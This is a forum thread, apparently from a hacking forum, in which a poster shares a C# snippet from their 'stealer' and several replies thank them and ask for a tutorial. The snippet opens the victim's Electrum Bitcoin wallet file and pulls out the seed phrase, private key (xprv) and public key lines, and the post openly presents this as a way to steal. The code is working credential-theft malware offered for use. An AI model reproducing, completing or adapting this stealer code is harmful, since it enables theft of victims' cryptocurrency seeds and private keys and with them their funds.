Sign in to follow this  
Jasmine

TUTORIALS [$] ELECTRUM BTC WALLET STEALER | EXAMPLE C# STEALER

Recommended Posts

This is basic and not FUD :pepo:

[hide]

[align=center]

string EWalletToParse = strAppData + "\Electrum\wallets\default_wallet";
           string EWalletParsed = "Electrum BTC Wallet\n";
           if (File.Exists(EWalletToParse))
           {

               using (StreamReader sr = new StreamReader(EWalletToParse))
               {
                   while (sr.Peek() >= 0)
                   {
                       string s = sr.ReadLine();
                       {
                           if (s.Contains("\"seed\""))
                               EWalletParsed += s + "\n";
                           if (s.Contains("\"type\""))
                               EWalletParsed += s + "\n";
                           if (s.Contains("\"xprv\""))
                               EWalletParsed += s + "\n";
                           if (s.Contains("\"xpub\"") && !EWalletParsed.Contains(s))
                               EWalletParsed += s + "\n";
                       }
                   }
               }
               result += EWalletParsed;
           }

[/hide][/align]

 

This is a snippet of my stealer. I chose it because its very simple Its self explaining if u know BTC u will know what we r stealing if not you know how to steal!

Share this post


Link to post
Share on other sites

Thanks Bro !

 

Edit : Can you give more Details ?

Share this post


Link to post
Share on other sites

nice post

Share this post


Link to post
Share on other sites

time for coding...

Share this post


Link to post
Share on other sites

tutorial please?

Share this post


Link to post
Share on other sites

thx miss thickness

Share this post


Link to post
Share on other sites

This is basic and not FUD :pepo:

 

 

This is a snippet of my stealer. I chose it because its very simple Its self explaining if u know BTC u will know what we r stealing if not you know how to steal!

 

thanks bro, pretty helpful

Share this post


Link to post
Share on other sites

Thanks allot

Share this post


Link to post
Share on other sites

For real? This stuff kinda have strong security

Share this post


Link to post
Share on other sites

let's see this in action

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this